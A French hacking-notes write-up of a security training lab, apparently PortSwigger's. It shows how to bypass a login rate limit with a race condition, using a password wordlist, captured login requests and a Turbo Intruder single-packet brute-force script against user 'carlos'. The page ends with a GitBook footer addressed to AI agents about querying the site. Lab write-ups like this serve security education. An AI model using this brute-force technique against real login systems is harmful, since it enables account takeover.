> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/race-conditions/rate-limit-bypass-via-race-condition.md).

# Contournement de la limitation de débit via une condition de concurrence

### Contournement des limitations de débit via des conditions de concurrence

Le mécanisme d'authentification met en place une **limite du nombre de tentatives** pour prévenir les attaques par force brute. / Cependant, \*\* il est observé\*\* que cette protection peut être contournée en raison d'une **condition de concurrence** lors du traitement de requêtes simultanées.

Objectif du laboratoire :

* Utilisez la condition de concurrence pour contourner la limitation.
* Trouver le mot de passe de l'utilisateur **carlos**.
* Se connecter à l'application.
* Accéder au panneau d'administration.
* Supprimer l'utilisateur **carlos**.

#### Liste de mots utilisée

```bash
123123
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
123456
mot de passe
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
1234567890
michael
x654321
superman
1qaz2wsx
baseball
7777777
121212
000000
```

#### Observation du mécanisme de connexion

Lors de l'envoi du formulaire de connexion, \*\* il est observé\*\* qu'une requête POST est transmise avec les paramètres suivants :

* `CSRF`
* `le nom d'utilisateur`
* `mot de passe`

```bash
csrf=8SbZ2jaR8pdJ0Q4r0XNqmTeVk5GJHxsx&username=wiener&password=peter
```

<figure><img src="/files/34c77a3c00c9a6613b570a7f536b32f30a7ee96f" alt=""><figcaption></figcaption></figure>

Après plusieurs tentatives incorrectes consécutives, **le message apparaît**:

> *Vous avez effectué trop de tentatives de connexion incorrectes. Veuillez réessayer dans XX secondes.*

Cela confirme la présence d'une **limitation de débit côté serveur**.

<figure><img src="/files/8acb28ce5b830064a7fcf6ac0b5adb1760de4fe2" alt=""><figcaption></figcaption></figure>

#### Contournement par condition de concurrence (tests manuels)

\*Mise en place d'un groupe « race condition ».

<figure><img src="/files/65376fc1b46de6481a7ebd7055c4e573871abbd0" alt=""><figcaption></figcaption></figure>

* Dupliquer l'onglet **10 fois**.

<figure><img src="/files/2ecc08802744106843bdea9e465a1921fb6a01c4" alt=""><figcaption></figcaption></figure>

* Envoyer toutes les requêtes **en parallèle**.

<figure><img src="/files/081920d4e97f35b3c356e875a148ebb9312fcb2e" alt=""><figcaption></figcaption></figure>

Test :

```bash
csrf=ab5gEWlWPKDUCJCQAlxrxR42dLIhJCWR&username=wiener&password=test
```

Observation : En envoyant en parallèle, **le blocage ne se produit pas** dans ce cas.

<figure><img src="/files/b93c61d901b6e9858ddf79fb0896889a974a9470" alt=""><figcaption></figcaption></figure>

#### Force brute parallèle sur Carlos avec Turbo Intruder

* Installez et utilisez le **Turbo Intruder** extension.

<figure><img src="/files/0101685e74da77aa287a7b9d9caa3107a17e553d" alt=""><figcaption></figcaption></figure>

* À partir de la requête de connexion : **Envoyer vers Turbo Intruder**.

<figure><img src="/files/a36af6700abf070bd3ac1d5f7234ca52852b343e" alt=""><figcaption></figcaption></figure>

* Sélectionnez le **`race single packet attack.py`** script.

<figure><img src="/files/6799a4cde647346305d36c066430cfab5e16a979" alt=""><figcaption></figcaption></figure>

* Copiez la liste de mots dans le **presse-papiers**, puis exécutez avec ce script :

```python
def queueRequests(target, wordlists):

    # si la cible prend en charge HTTP/2, utilisez engine=Engine.BURP2 pour déclencher l'attaque par paquet unique
    # s'ils ne prennent en charge que HTTP/1, utilisez Engine.THREADED ou Engine.BURP à la place
    # pour plus d'informations, consultez https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )


    passwords = wordlists.clipboard
    # l'argument 'gate' retient une partie de chaque requête jusqu'à ce que openGate soit appelé
    # si vous voyez un horodatage négatif, le serveur a répondu avant que la requête ne soit terminée
    for password in passwords:
        engine.queue(target.req, password, gate='race1')

    # une fois que chaque requête étiquetée 'race1' a été mise en file d'attente
    # invoquez engine.openGate() pour les envoyer en synchronisation
    engine.openGate('race1')


def handleResponse(req, interesting):
    table.add(req)

```

#### Résultat observé

En testant toutes les valeurs en parallèle, un mot de passe renvoie un \*\*code HTTP 302\*\* (indicateur de connexion réussie).

<figure><img src="/files/ffa03d7158e5d17e2029c5c58c6265278738297b" alt=""><figcaption></figcaption></figure>

\*\*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/race-conditions/rate-limit-bypass-via-race-condition.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
